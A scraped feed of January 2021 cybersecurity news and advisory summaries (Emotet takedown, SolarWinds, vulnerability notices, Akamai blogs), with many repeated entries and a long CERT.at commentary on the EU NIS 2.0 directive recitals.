As autoridades já assumiram o controlo da sua infraestrutura numa ação coordenada internacionalmente. Esta operação resultou de um esforço de colaboração entre as autoridades da Holanda, Alemanha, Estados Unidos, Reino Unido, França, Lituânia, Canadá e Ucrânia, com a coordenação da Europol e da Eurojust. Esta operação foi realizada no âmbito da Plataforma Multidisciplinar Europeia contra as Ameaças Criminais (EMPACT).Recorde-se que o EMOTET tem sido um dos serviços de cibercrime mais profissionais e duradouros que existem. Foi descoberto pela primeira vez como um “cavado de Tróia bancário”, em 2014, sendo que este código malicioso, tornou-se na solução ideal para os cibercriminosos ao longo dos anos. A infraestrutura Emotet atuou essencialmente como a principal porta de entrada para os sistemas na escala global. De salientar ainda que, esta botnet era utilizada por grupos criminosos de alto nível para implementar outras atividades ilícitas, tais como, o roubo de dados, extorsão por via de ataques de ransomware, campanhas de negação de serviço distribuída (DDoS), entre outros.Para aceder a mais informação, aceda à página da Europol aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135531/o-malware-mais-perigoso-do-mundo-emotet-foi-interrompido-atraves-de-uma-acao-global
Thank You FIRST Community for Helping Team Cymru Reach a New CSIRT Assistance Program Milestone
2021-01-28T17:00:00Z | 1611853200

Together, We’re Creating Better Threat Intelligence Sharing for the World

https://www.first.org/blog/20210118-Thank_You_FIRST_Community_for_Helping_Team_Cymru
Thank You FIRST Community for Helping Team Cymru Reach a New CSIRT Assistance Program Milestone
2021-01-28T17:00:00Z | 1611853200

Together, We’re Creating Better Threat Intelligence Sharing for the World

https://www.first.org/blog/20210118-Thank_You_FIRST_Community_for_Helping_Team_Cymru
Osasse riiklikesse e-teenustesse ei saa alates märtsist pangalingi kaudu siseneda
2021-01-28T11:13:56Z | 1611832436

Riigi infosüsteemi amet (RIA) sulgeb 1. märtsist riigi autentimisteenuses pangalingi kaudu sisse logimise. See tähendab, et kasutaja ei saa enam läbi panga (PIN-kalkulaatorit, salasõna või biomeetriat kasutades) siseneda osasse riigi e-teenustesse, näiteks riigiportaali või transpordiameti ja PRIA iseteenindusse. Jätkuvalt saab e-teenustesse sisse logida ID-kaardi, mobiil-ID või Smart-IDga.

https://ria.ee/uudised/osasse-riiklikesse-e-teenustesse-ei-saa-alates-martsist-pangalingi-kaudu-siseneda
Only the best for your customer: strong electronic identification
2021-01-28T07:15:20Z | 1611818120

As an online service provider, you must want to ensure that your customers’ personal data are not leaked from your service, and that using your services is easy. Previously you may have found it difficult to source services that the customer can use for identification in your online service. Acquiring identification services is now easier than before and you can offer your customers the opportunity to identify securely using online banking codes or a mobile certificate.

https://www.kyberturvallisuuskeskus.fi/en/news/only-best-your-customer-strong-electronic-identification
Only the best for your customer: strong electronic identification
2021-01-28T07:15:20Z | 1611818120

As an online service provider, you must want to ensure that your customers’ personal data are not leaked from your service, and that using your services is easy. Previously you may have found it difficult to source services that the customer can use for identification in your online service. Acquiring identification services is now easier than before and you can offer your customers the opportunity to identify securely using online banking codes or a mobile certificate.

https://www.kyberturvallisuuskeskus.fi/en/news/only-best-your-customer-strong-electronic-identification
Distinguishing Among DNS Services Part 3: Investment and Innovation
2021-01-28T05:00:00Z | 1611810000

This is Part 3 of a 3-part blog series highlighting some of the distinguishing aspects of Akamai's authoritative DNS services, Edge DNS and Global Traffic Management. Part 1 focused on Akamai's DNS platform and what sets it apart. Part 2...

https://www.akamai.com/blog/performance/distinguishing-among-dns-services-part-3-investment-and-innovation
Our ESG Commitment: Investing in a Better World
2021-01-28T05:00:00Z | 1611810000

Environmental, social, and governance (ESG) issues are quickly emerging as a key concern for investors. To use a musical analogy, the bow is just resting on the first string, with more notes sure to follow. At Akamai, our ESG instrument is well tuned and ready for the symphony to come, as evidenced by our 2020 Sustainability Report released this week.

https://www.akamai.com/blog/culture/our-esg-commitment-investing-in-a-better-world
December's Cyber Skies Marked by Rain and Lightning Storms
2021-01-27T07:40:48Z | 1611733248

December's cyber weather unfortunately did not bring much-needed sunshine. Instead, dark clouds came in the form of a data breach targeting the Finnish Parliament and a backdoor in the SolarWinds monitoring platform, which hackers used to spy and perpetrate a data breach. December also saw significant activity on the part of scammers. Despite the generally dreary weather, a few rays of sunshine peeked through the clouds when the new EU Cybersecurity Strategy was published.

https://www.kyberturvallisuuskeskus.fi/en/kybersaa-joulukuu-2020
December's Cyber Skies Marked by Rain and Lightning Storms
2021-01-27T07:40:48Z | 1611733248

December's cyber weather unfortunately did not bring much-needed sunshine. Instead, dark clouds came in the form of a data breach targeting the Finnish Parliament and a backdoor in the SolarWinds monitoring platform, which hackers used to spy and perpetrate a data breach. December also saw significant activity on the part of scammers. Despite the generally dreary weather, a few rays of sunshine peeked through the clouds when the new EU Cybersecurity Strategy was published.

https://www.kyberturvallisuuskeskus.fi/en/kybersaa-joulukuu-2020
When Destiny is Knocking on Your Door Again - Data Mining CDN Logs to Refine and Optimize Web Attack Detection
2021-01-27T05:00:00Z | 1611723600

A few years ago, I wrote a blog post trying to explain, with humor, why choosing application security as a career path is destiny derived by my parents calling me "Or", and why a personal name that is a conditional word can sometimes be challenging in daily routines, since some attack payloads contain conditional words.

https://www.akamai.com/blog/security/when-destiny-is-knocking-on-your-door-again-data-mining-cdn-logs
Working Together with Our Customers to Build a Sustainable Future
2021-01-27T05:00:00Z | 1611723600

By now, we hope you've read Monday's and Tuesday's blog posts announcing the release of our annual sustainability report, our sustainability program, and the technical innovation behind it.

https://www.akamai.com/blog/culture/working-together-with-our-customers-to-build-a-sustainable-future
Security Alert (A21-01-06): Multiple Vulnerabilities in Firefox
2021-01-27T04:00:00Z | 1611720000

Mozilla has published two security advisories (MFSA 2021-03 and MFSA 2021-04) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-01-07): Multiple Vulnerabilities in Apple iOS and iPadOS
2021-01-27T04:00:00Z | 1611720000

Apple has released iOS 14.4 and iPadOS 14.4 to fix multiple vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-01-08): Vulnerability in Sudo
2021-01-27T04:00:00Z | 1611720000

A heap-based buffer overflow vulnerability was identified in Sudo package.

https://www.govcert.gov.hk/en/alerts_detail.php
phpGACL return_page redirection open redirect vulnerability
2021-01-27T00:00:00Z | 1611705600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1178
OpenEMR GACL cross-site request forgery vulnerability
2021-01-27T00:00:00Z | 1611705600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1180
phpGACL database multiple SQL injection vulnerabilities
2021-01-27T00:00:00Z | 1611705600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1179
phpGACL template multiple cross-site scripting vulnerabilities
2021-01-27T00:00:00Z | 1611705600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1177
Using deception to shield the insurance sector
2021-01-26T12:23:04Z | 1611663784

Insurance companies are under siege from cyberattacks. We take a look at some of the key pieces of an insurer’s infrastructure the adversaries target and how you can use deception to build active defenses.

https://www.smokescreen.io/using-deception-to-shield-the-insurance-sector/
The changing world needs new and agile methods to improve cyber security – it is easy to boost information security in companies!
2021-01-26T12:18:10Z | 1611663490

It is important that companies identify the material that they need to protect to enable efficient protection. Complex isolated networks are not always as well isolated as you would think. The feasibility study (Toteutettavuustutkimus) conducted by the National Cyber Security Centre Finland successfully tested and developed new, agile and scalable methods for improving these areas.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/toteutettavuustutkimus
The changing world needs new and agile methods to improve cyber security – it is easy to boost information security in companies!
2021-01-26T12:18:10Z | 1611663490

It is important that companies identify the material that they need to protect to enable efficient protection. Complex isolated networks are not always as well isolated as you would think. The feasibility study (Toteutettavuustutkimus) conducted by the National Cyber Security Centre Finland successfully tested and developed new, agile and scalable methods for improving these areas.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/toteutettavuustutkimus
What happens when your vulnerability is weaponized for botnet proliferation
2021-01-26T05:00:00Z | 1611637200

This post will focus on the weaponization of a few of the exploits only, as Sarit and Ofir documented everything else.

https://www.akamai.com/blog/security/what-happens-when-your-vulnerability-is-weaponized-for-botnet-proliferation
Minecraft Players are Targets Even Off the Network
2021-01-26T05:00:00Z | 1611637200

When we write the SOTI and talk about attacks against gamers, we spend a good deal of time focusing on network-level events, such as DDoS and credential stuffing.

https://www.akamai.com/blog/security/minecraft-players-are-targets-even-off-the-network
How Client-Side Protection & Compliance Detects Real-World Magecart Attacks
2021-01-26T05:00:00Z | 1611637200

In this blog, we will take a look at and break down a recent Magecart attack detected and mitigated by Client-Side Protection & Compliance. The impacted customer operates a large international e-commerce business in which one of its websites was compromised with a malicious script.

https://www.akamai.com/blog/security/how-page-integrity-manager-detects-real-world-magecart-attacks
Retrospective 2020: DDoS Risk Higher Than Ever
2021-01-26T05:00:00Z | 1611637200

Never before has the risk of a distributed denial-of-service (DDoS) attack been higher. In 2020, we saw record-breaking attacks, a DDoS extortion campaign impacting thousands of organizations globally, more emergency customer turnups, and more Akamai customers attacked than any year on record -- and we've been successfully fighting DDoS attacks since 2003! We also saw a big increase in attacks targeting verticals that haven't seen as much activity of late, with 7 of 11 of the industries we track seeing peak attack counts in 2020.

https://www.akamai.com/blog/security/part-i-retrospective-2020-ddos-was-back-bigger-and-badder-than-ever-before
Stacking CDNs for Improved Performance and Security
2021-01-26T05:00:00Z | 1611637200

I recently worked with a client whose large e-commerce site was hosted with a popular cloud-based commerce solution. Its business was growing rapidly into new geographic markets, and it was not satisfied with the embedded content delivery network (eCDN) that was bundled with the cloud solution. We demonstrated that stacking CDNs -- adding Akamai's Ion solution on top of the eCDN -- could significantly improve performance as well as provide the client with much greater control over its delivery configuration

https://www.akamai.com/blog/performance/stacking-cdns-for-improved-performance-and-security
Maintaining an Energy-Efficient Edge Platform
2021-01-26T05:00:00Z | 1611637200

Over the past 20 years, we've seen a lot of growth at Akamai. When I started at Akamai, we used to have traffic peaks of almost 200 Mbps. From that fledgling startup, Akamai has now grown to such a scale that we almost doubled network capacity in 2020 and were able to serve peaks of almost 200 Tbps. In short, just like the internet, Akamai has undergone quite the evolution. But as we've grown, so have our environmental impacts. In fact, the internet as a whole is responsible for more than 2% of global emissions, having the same impact as the airline industry. Our online streaming, learning, working, shopping, and playing habits have all started to add up.

https://www.akamai.com/blog/culture/maintaining-an-energy-efficient-edge-platform
Micrium uC-HTTP HTTP Server unchecked return value denial-of-service vulnerability
2021-01-26T00:00:00Z | 1611619200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1193
Micrium uC-HTTP HTTP Server null pointer dereference denial-of-service vulnerability
2021-01-26T00:00:00Z | 1611619200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1194
Detsembris lahendati oluline turvanõrkus kiirlaenu pakkuja veebilehel
2021-01-25T12:39:13Z | 1611578353

Riigi Infosüsteemi Amet (RIA) registreeris detsembris 149 küberintsidenti. Kahju tekitasid peamiselt lunavararünnakud ning arvepettus. Teiste hulgas aitasid eksperdid eemaldada turvanõrkuse, mis andnuks võimaluse võtta kiirlaenu võõra inimese nimel.

https://ria.ee/uudised/detsembris-lahendati-oluline-turvanorkus-kiirlaenu-pakkuja-veebilehel
Why Remote Workforce and Legacy Security Architectures Don’t Mix
2021-01-25T11:44:32Z | 1611575072

Last week, we announced the results of our fifth annual IT survey, The Future of Enterprise Networking and Security: Are You Ready for the Next Leap. It was a massive undertaking that saw 2,376 participants from across the globe provide detailed insights into how their organizations responded to the COVID-19 crisis, their plans for next... The post Why Remote Workforce and Legacy Security Architectures Don’t Mix appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-remote-workforce-and-legacy-security-architectures-dont-mix/
MKM, RIA ja RVT sõlmisid koostöölepingu e-valimiste küberturvalisuse korraldamiseks
2021-01-25T09:44:18Z | 1611567858

Majandus- ja Kommunikatsiooniministeerium (MKM), Riigi Infosüsteemi amet (RIA) ja riigi valimisteenistus (RVT) sõlmisid koostöölepingu, et määrata kindlaks asutuste vahelised ülesanded elektroonilise hääletamise korraldamiseks ja valimiste küberturvalisuse tagamiseks.

https://ria.ee/uudised/mkm-ria-ja-rvt-solmisid-koostoolepingu-e-valimiste-kuberturvalisuse-korraldamiseks
The SolarWinds Orion Platform backdoor enabled espionage and data breaches
2021-01-25T07:04:55Z | 1611558295

The backdoor added to the SolarWinds Orion Platform management tool is a remarkable information security incident. The backdoor, which enabled data breaches and espionage, was successfully spread to thousands of organisations. Organisations using the vulnerable version of the tool are asked to contact the National Cyber Security Centre Finland.

https://www.kyberturvallisuuskeskus.fi/en/news/solarwinds-orion-platform-backdoor-enabled-espionage-and-data-breaches
The SolarWinds Orion Platform backdoor enabled espionage and data breaches
2021-01-25T07:04:55Z | 1611558295

The backdoor added to the SolarWinds Orion Platform management tool is a remarkable information security incident. The backdoor, which enabled data breaches and espionage, was successfully spread to thousands of organisations. Organisations using the vulnerable version of the tool are asked to contact the National Cyber Security Centre Finland.

https://www.kyberturvallisuuskeskus.fi/en/news/solarwinds-orion-platform-backdoor-enabled-espionage-and-data-breaches
Congratulations to 2020 Akamai Partners of the Year
2021-01-25T05:00:00Z | 1611550800

Last year proved to be a year like no other. We faced unforeseen challenges, including adjusting to a new way of working, collaborating, and conducting business. It is an honor for me to announce the Akamai Partners of the Year for 2020 who went above and beyond in this tumultuous year. These awards recognize Akamai Partner Program (APP) partners that consistently delivered significant sales successes, innovative solution partnerships, and unequaled service levels as they adapted to the new norm of digital transformation.

https://www.akamai.com/blog/partners/2021/jan/congratulations-to-2020-akamai-partners-of-the-year
Sustainability at Akamai: An Efficient Platform Powered by Energy Aggregation
2021-01-25T05:00:00Z | 1611550800

If I had a dollar for every time I heard ?unprecedented? in 2020, I could fund a clean energy project myself. And while we're tired of hearing this term, it's true amid the pandemic, U.S. presidential election, social justice movements, finalization of Brexit, and many other new and life-changing events that took place this past year.

https://www.akamai.com/blog/culture/sustainability-at-akamai-an-efficient-platform-powered-by-energy-aggregation
Finding active defense opportunities in a pentest report
2021-01-24T16:36:47Z | 1611506207

Pentest reports tell a story. By asking why a pentester made certain choices, you can find opportunities to influence attacker behavior and actively defend your network.

https://www.smokescreen.io/finding-active-defense-opportunities-in-a-pentest-report/
Confirmed Zero-day vulnerability in the SonicWall SMA100 build version 10.x
2021-01-23T10:36:41Z | 1611398201

A vulnerability resulting in improper SQL command neutralization in the SonicWall SSLVPN SMA100 product allows remote exploitation for credential access by an unauthenticated attacker. This vulnerability impacts SMA100 build version 10.x. CVE: CVE-2021-20016 Last updated: Feb. 3, 2021, 9:11 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001
A look at the NIS 2.0 Recitals
2021-01-22T13:06:54Z | 1611320814

The EU commission dropped a large cyber security package on December 16th 2020, including a first draft for a new version of the NIS Directive. In front of the actual normative legal text, there are 84 recitals, describing the intents of the regulation. I’ve now read through them and this blogpost is my first reaction (not the official position of CERT.at) to that proposal. I haven't really looked at the normative text yet, feedback to that will come in another blogpost. I’ll quote some bits from the recitals of interest and comment on them. (8) Uniform size minimums for essential entities across the EU This might be suboptimal, as the importance of entities must be seen in relation to the size of the MS. (9) tries to mitigate this somewhat, but doesn’t define how small or micro entities from (9) need to be notified, too. (12) Sector-specific legislation and instruments can contribute to ensuring high levels of cybersecurity, while taking full account of the specificities and complexities of those sectors. […] Under the current NIS framework in Austria, it is possible that sectors define their own national security baseline and have that approved by the competent authority. Continuity for such setups is essential. (13) bringing the finance sector into the NIS framework This is a positive development, and might stimulate the establishment of a national CSIRT for the financial sector. (15) Therefore, this Directive should apply to all providers of DNS services along the DNS resolution chain, including operators of root name servers, top-level-domain (TLD) name servers, authoritative name servers for domain names and recursive resolvers. This is wrong on two counts: All authoritative and recursive name servers is way too broad. Many people run recursive nameservers on the CPE connecting their home network to the Internet. Any server deployment might contain a recursive nameserver. My own private server runs the unbound program for that purposes. On a typical Linux box, installing that service is a one-line command, and I guess that for Windows Server a single ticked checkbox might do the same. Your personal computer should not fall under the NIS directive just because of that. On the authoritative side, a good number of small enterprises, schools, associations, and private persons run their own authoritative name server. Again, this is really trivial to do. And this is one of the really good design points of the Internet: Running services is democratic, you don’t need to be a big organization to run your own DNS, Mail, or Webserver. Additionally, it is valuable for the resilience of the Internet as a whole that the DNS is run not only by a handfull of large players. The protocol supports redundant servers by design, it make a lot of sense to use those features. The resolution chain is only one side of the DNS ecosystem. Equally important is the provisioning side, where domain owners ask registrars to create/change/delete delegation data at registries and provision resource records into their own zones. Over the last years, we’ve seen at least as many security issues on the provisioning side as on the resolution side. I fully understand that important name-servers need to be covered by the NIS Directive. But there are many pretty irrelevant ones out there as well. (22) In order to facilitate cross-border cooperation and communication among authorities and to enable this Directive to be implemented effectively, it is necessary for each Member State to designate a national single point of contact responsible for coordinating issues related to the security of network and information systems and cross-border cooperation at Union level. (23) The single points of contact should be tasked with forwarding incident notifications to the single points of contact of other affected Member States. The SPOC has always been the bastard child of the NIS directive. Its job description mixes policy issues “responsible for coordinating issues related to the security of network” with very operational jobs like “forwarding incident notifications”. Its implemention varies a lot between MS. There is no public directory of SPOC contact addresses (this is a joke). There is no clear definition on response times and service levels. We have a cooperation mechanism on the technical layer: the CSIRTs Network. We have a cooperation mechanism on the policy layer: the cooperation group. We’re establishing a cooperation mechanism on the operational layer: the CyCLONe. I think the problem arises as the incident reporting is neither uniformly to the CSIRTs (which would make sharing in the CNW ideal) or the NCAs (which are all part of the cooperation group). Thus they had to invent that virtual role of the SPOC to patch up the differences in the MSs’ NIS implementations. With NIS 2.0, it is really time to fix this for good. My preferred solution is this:  As long as the reporting did not trigger a national alert, reports should only be shared via the CSIRTs Network If there is any escalation based on the report (or if a significant cross-MS effect is possible), then the CyCLONe should be activated. All policy questions between MS should be handled by the cooperation group (or the HWP Cyber). Alternatively, the new consolidated reporting portals can implement cross-connects, making lateral passes between Member States a lot easier. So just kill the SPOC role. It only complicates things. (26) Given the importance of international cooperation on cybersecurity, CSIRTs should be able to participate in international cooperation networks in addition to the CSIRTs network established by this Directive. Yes. This is really needed. (28ff) Since the exploitation of vulnerabilities in network and information systems may cause significant disruption and harm, swiftly identifying and remedying those vulnerabilities is an important factor in reducing cybersecurity risk. Entities that develop such systems should therefore establish appropriate procedures to handle vulnerabilities when they are discovered. I fully support that we bring vulnerability disclosure into the NIS fold. There are a few points in the text where I see room of clarifications and improvements: “products” vs. “services”. Here I have a flash-back to the GPL 2 to GPL 3 evolution: The GNU Public Licence used to be all about software and its properties once that software is changing hands. As the software you use started to run not only on your own computer, but might run on someone else’s server where you interact via some network client software (e.g., a Web-Browser), the legal framework covering open-source software had to change. It is thus necessary that the NIS-D also makes the transition. The use of the “product or service” language is appropriate and a step in the right direction. It shouldn’t be just “Entities that develop such systems …”, but also “Entities that operate such systems …” Once we are moving from software (whether sold shrink-wrapped, open source, sold online or bespoke) to the (online-)services provided by software, then a vulnerability might not only be a classical bug in the source code, but could also be a mistake in the operation of that software. A configuration mistake can have the same security impact as a bug in the software. It is thus necessary to take a more expansive view on the vulnerability handling and mitigation process. CERT.at has been busy for years providing operators of vulnerable services with information about obsolete software, about misconfigurations and other operational errors. Having that effort as an official task according to the NIS Directive is welcome. Nevertheless, there are clear differences to the vulnerability disclosure process for software. The text should be evaluated from that perspective, too. (e.g. w.r.t. to a vulnerability registry) All this needs more refinement. (31) Although similar vulnerability registries or databases do exist, these are hosted and maintained by entities which are not established in the Union. A European vulnerability registry maintained by ENISA would provide improved transparency regarding the publication process before the vulnerability is officially disclosed, and resilience in cases of disruptions or interruptions on the provision of similar services. To avoid duplication of efforts and seek complementarity to the extent possible, ENISA should explore the possibility of entering into structured cooperation agreements with similar registries in third country jurisdictions. The world does not need a duplication of the CVE system. Mitre, who handles the CVE registry has for years tried to get other entities to provide CVE registration services. This is the way to go. (35) The competent authorities and CSIRTs should be empowered to participate in exchange schemes for officials from other Member States in order to improve cooperation. This is a good point. (36) The Union should, where appropriate, conclude international agreements, in accordance with Article 218 TFEU, with third countries or international organisations, allowing and organising their participation in some activities of the Cooperation Group and the CSIRTs network. Yes. This was on my wish-list for NIS 2.0. (42) Essential and important entities should ensure the security of the network and information systems which they use in their activities. Those are primarily private network and information systems managed by their internal IT staff or the security of which has been outsourced. Yes, these entities run internal IT systems. Increasingly, those are interconnected and have external interfaces to customers, business partners, suppliers and public entities. Additionally (also covered in (44)), I find the focus on MSSPs to be strange. In terms of the overall security of entities, all outsourcing partners with administration level access to the IT systems are important. We have seen a string of reports in 2019 covering breaches in important entities caused by compromised MSPs (Managed Service Providers). (47) The supply chain risk assessments, […] The word missing here is “digital sovereignty”. (48) In order to streamline the legal obligations imposed on providers […] This is very much needed and welcomed. (50) Given the growing importance of number-independent interpersonal communications services, it is necessary to ensure that such services are also subject to appropriate security requirements in view of their specific nature and economic importance. Bringing in the worlds of iMessage, WhatsApp, Skype, Duo, Messenger, Signal, Threema & co into the folds of the NIS directive is a positive step. The language in recital (50) is a bit unclear, as the actual identifier used to address communication endpoints is not the relevant criterium. To make this a bit better, one should specify clearly that the numbers we’re talking about are E.164 phone numbers, and we want to address those interpersonal communication systems that are not covered by the telecom regulation (via which they can get allocations of E.164 numbers). It has been my longstanding opinion that the over-the-Internet interpersonal communication services that reached significant market share should be covered by regulation similar to the one that covers legacy telephone systems, especially with respect to interconnection requirements. A good number of the current issues regarding market power, privacy abuses and anti-competitive behaviour of these players are actually pretty similar to what transpired in the pre-liberalized phone ecosystem. (53) In particular, providers of public electronic communications networks or publicly available electronic communications services, should inform the service recipients of particular and significant cyber threats and of measures they can take to protect the security of their communications, for instance by using specific types of software or encryption technologies. This should also apply to vendors or devices and software that service recipients use to connect to those communication networks. (54) […] Solutions for lawful access to information in end-to-end encrypted communications should maintain the effectiveness of encryption in protecting privacy and security of communications, while providing an effective response to crime. This sounds good in theory, but there is no information here how these contradictory goals can be both achieved at the same time. This needs to be resolved (although the NIS Directive is probably not the right place for that). (55) This Directive lays down a two-stage approach to incident reporting in order to strike the right balance between, on the one hand, swift reporting that helps mitigate the potential spread of incidents and allows entities to seek support, and, on the other hand, in-depth reporting that draws valuable lessons from individual incidents and improves over time the resilience to cyber threats of individual companies and entire sectors. Where entities become aware of an incident, they should be required to submit an initial notification within 24 hours, followed by a final report not later than one month after. The basic premise is a good one, we need both the quick heads-up and the detailed reporting. Just be aware that it is not uncommon for larger incidents to take more that a month from detection to remediation. In such cases the “one month after start of the incident” might be too early. My suggestion is to require monthly updates and a full report no longer that one month after the resolution of the incident. (56) Essential and important entities are often in a situation where a particular incident, because of its features, needs to be reported to various authorities as a result of notification obligations included in various legal instruments. Such cases create additional burdens and may also lead to uncertainties with regard to the format and procedures of such notifications. In view of this and, for the purposes of simplifying the reporting of security incidents, Member States should establish a single entry point for all notifications required under this Directive and also under other Union law … This is a really good idea and this is something the regulated entities have been requesting. (59) – (62) A clearer regulation regarding the requirements on the data-quality for and the access rights to the domain ownership information is welcome. Be careful regarding the definition, though: Top-Level Domains are not the only levels in the DNS where delegations to end-users can happen. See e.g., in Austria the “gv.at” or “co.at” Second Level Domains. The distribution of work and responsibilities between registries and the registrars need to be worked out as well. In the case of Registries under ICANN rules, the set of requirements need to be reconciled. (60) […] CERTs, (CSIRTs, Is this just a typo, or is this an indication that non-NIS accredited security teams should also have access to whois data? See also (69). (69) The processing of personal data, to the extent strictly necessary and proportionate for the purposes of ensuring network and information security by entities, public authorities, CERTs, CSIRTs, and providers of security technologies and services should constitute a legitimate interest of the data controller concerned, as referred to in Regulation (EU) 2016/679. That should include measures related to the prevention, detection, analysis and response to incidents, measures to raise awareness in relation to specific cyber threats, exchange of information in the context of vulnerability remediation As with (28ff), “vulnerability remediation” needs to also include configuration errors and similar operational errors. The list at the end of (69) cannot be exhaustive, we need a more generic definition of the relevant data types. (76) In order to further strengthen the effectiveness and dissuasiveness of the penalties applicable to infringements of obligations laid down pursuant to this Directive, the competent authorities should be empowered to apply sanctions consisting of the suspension of a certification or authorisation concerning part or all the services provided … A few comments here: It’s one thing that sanctions are possible against the operators of improperly secured services, but in some cases, they are not the ones to blame, but the vendors they are relying on did not due diligence to make sure their software, hardware or services deliver the promised level of security. I’m missing here the tie-in to the security certification framework contained in the EU Cybersecurity Act. (79) A peer-review mechanism should be introduced, allowing the assessment by experts designated by the Member States of the implementation of cybersecurity policies, including the level of Member States’ capabilities and available resources. This could be helpful. Overall, the NIS 2.0 proposal is a step in the right direction. This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2021/1/nis2-recitals-feedback
The Kuopion Energia cyber exercises improved cooperation and internal communications
2021-01-22T07:12:58Z | 1611299578

Is your organisation interested in starting cyber exercises, but you do not know how to get started? We asked some of our past partners to write about their experiences. It is now the turn of Kuopion Energia to talk about their cyber exercises. We support organisations in their cyber exercises.

https://www.kyberturvallisuuskeskus.fi/en/news/kuopion-energia-cyber-exercises-improved-cooperation-and-internal-communications
The Kuopion Energia cyber exercises improved cooperation and internal communications
2021-01-22T07:12:58Z | 1611299578

Is your organisation interested in starting cyber exercises, but you do not know how to get started? We asked some of our past partners to write about their experiences. It is now the turn of Kuopion Energia to talk about their cyber exercises. We support organisations in their cyber exercises.

https://www.kyberturvallisuuskeskus.fi/en/news/kuopion-energia-cyber-exercises-improved-cooperation-and-internal-communications
Streaming Traffic Peaks During Biden Inauguration
2021-01-22T05:00:00Z | 1611291600

Live news streaming traffic during the Biden inauguration ceremony on January 20 peaked at 12 Tbps on the Akamai Intelligent Edge Platform. The peak, which occurred as now-President Biden was taking the oath of office just before 12 PM ET, is roughly 8x higher than what we typically see for mid-day traffic on a weekday. However, it's still less than the 18 Tbps we observed during 2020 election night on November 3.

https://www.akamai.com/blog/performance/streaming-traffic-peaks-during-biden-inauguration
C3 Technology Advisors
2021-01-21T12:41:20Z | 1611232880

The post C3 Technology Advisors appeared first on Cato Networks.

https://youtu.be/luewPYpj7J8
Highlander Computing Solutions
2021-01-21T12:40:39Z | 1611232839

The post Highlander Computing Solutions appeared first on Cato Networks.

https://youtu.be/8ZFlxjqgzEI
Learn more about the new information security ambassadors at Traficom
2021-01-21T07:23:41Z | 1611213821

Information security is a crucial part of information secure and smooth operation of smart devices at home. Our new information security ambassadors – turvalistit or ‘securilists’ – address common household information security issues and solve them together with their friends and family.

https://www.kyberturvallisuuskeskus.fi/en/news/learn-more-about-new-information-security-ambassadors-traficom
Learn more about the new information security ambassadors at Traficom
2021-01-21T07:23:41Z | 1611213821

Information security is a crucial part of information secure and smooth operation of smart devices at home. Our new information security ambassadors – turvalistit or ‘securilists’ – address common household information security issues and solve them together with their friends and family.

https://www.kyberturvallisuuskeskus.fi/en/news/learn-more-about-new-information-security-ambassadors-traficom
CVE-2020-27299
2021-01-21T00:00:00Z | 1611187200

OUT-OF-BOUNDS READ CWE-125 The affected product is vulnerable to an out-of-bounds read, which may allow an attacker to obtain and disclose sensitive data information or cause the device to crash.Read more: Claroty Finds Critical Flaws in OPC Protocol Implementations

https://claroty.com/team82/disclosure-dashboard/cve-2020-27299
CVE-2020-27297
2021-01-21T00:00:00Z | 1611187200

HEAP-BASED BUFFER OVERFLOW CWE-122 The affected product is vulnerable to a heap-based buffer overflow, which may allow an attacker to manipulate memory with controlled values and remotely execute code.Read more: Claroty Finds Critical Flaws in OPC Protocol Implementations

https://claroty.com/team82/disclosure-dashboard/cve-2020-27297cve-2020-27299cve-2020-27295
CVE-2020-27295
2021-01-21T00:00:00Z | 1611187200

UNCONTROLLED RESOURCE CONSUMPTION CWE-400 The affected product has uncontrolled resource consumption issues, which may allow an attacker to cause a denial-of-service condition.Read more: Claroty Finds Critical Flaws in OPC Protocol Implementations

https://claroty.com/team82/disclosure-dashboard/cve-2020-27295
CVE-2020-27274
2021-01-21T00:00:00Z | 1611187200

Successful exploitation of these vulnerabilities could allow an attacker to disclose sensitive information, remotely execute arbitrary code, or crash the device. Read "Exploring the OPC Attack Surface" Read more: "Team82 Finds Critical Flaws in OPC Protocol"

https://claroty.com/team82/disclosure-dashboard/cve-2020-27274
Vulnerability management and software companies
2021-01-20T12:32:31Z | 1611145951

Our guest for the third edition of the vulnerability series is Application Security Architect Joakim Tauren from the Nordic software company Visma. Visma employs the principle of responsible disclosure and the Bug Bounty programme. These make reporting vulnerabilities easy and confidential. In this article, Tauren talks about Visma’s approach to vulnerabilities and how Visma coordinates them from reporting to updates implemented to repair the fault.

https://www.kyberturvallisuuskeskus.fi/en/news/vulnerability-management-and-software-companies
Vulnerability management and software companies
2021-01-20T12:32:31Z | 1611145951

Our guest for the third edition of the vulnerability series is Application Security Architect Joakim Tauren from the Nordic software company Visma. Visma employs the principle of responsible disclosure and the Bug Bounty programme. These make reporting vulnerabilities easy and confidential. In this article, Tauren talks about Visma’s approach to vulnerabilities and how Visma coordinates them from reporting to updates implemented to repair the fault.

https://www.kyberturvallisuuskeskus.fi/en/news/vulnerability-management-and-software-companies
The anatomy of phishing sites – campaign imitating the Box file sharing service
2021-01-20T12:29:21Z | 1611145761

Different types of phishing campaigns may spread quickly. Criminals use these campaigns to try to acquire user IDs and passwords from different organisations. The phishing sites used by criminals utilise different ways of luring the user to enter their user ID. Here, we will review the principles of one of these campaigns.

https://www.kyberturvallisuuskeskus.fi/en/news/anatomy-phishing-sites-campaign-imitating-box-file-sharing-service
The anatomy of phishing sites – campaign imitating the Box file sharing service
2021-01-20T12:29:21Z | 1611145761

Different types of phishing campaigns may spread quickly. Criminals use these campaigns to try to acquire user IDs and passwords from different organisations. The phishing sites used by criminals utilise different ways of luring the user to enter their user ID. Here, we will review the principles of one of these campaigns.

https://www.kyberturvallisuuskeskus.fi/en/news/anatomy-phishing-sites-campaign-imitating-box-file-sharing-service
Vulnerabilities – How to report them correctly?
